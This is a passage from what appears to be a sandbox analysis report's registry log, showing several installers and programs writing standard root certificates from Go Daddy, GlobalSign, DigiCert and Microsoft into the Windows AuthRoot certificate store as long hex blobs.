f7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410 AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Google chrome.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e OperaGXSetup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 1900000001000000100000009f687581f7ef744ecfc12b9cee6238f10f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e0b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000006200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e1270090000000100000016000000301406082b0601050507030306082b06010505070308140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa2040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 rsEngineSvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c000000010000000400000000100000040000000100000010000000be954f16012122448ca8bc279602acf5030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2090000000100000016000000301406082b0601050507030306082b060105050703086200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e12700b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000000f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e1900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa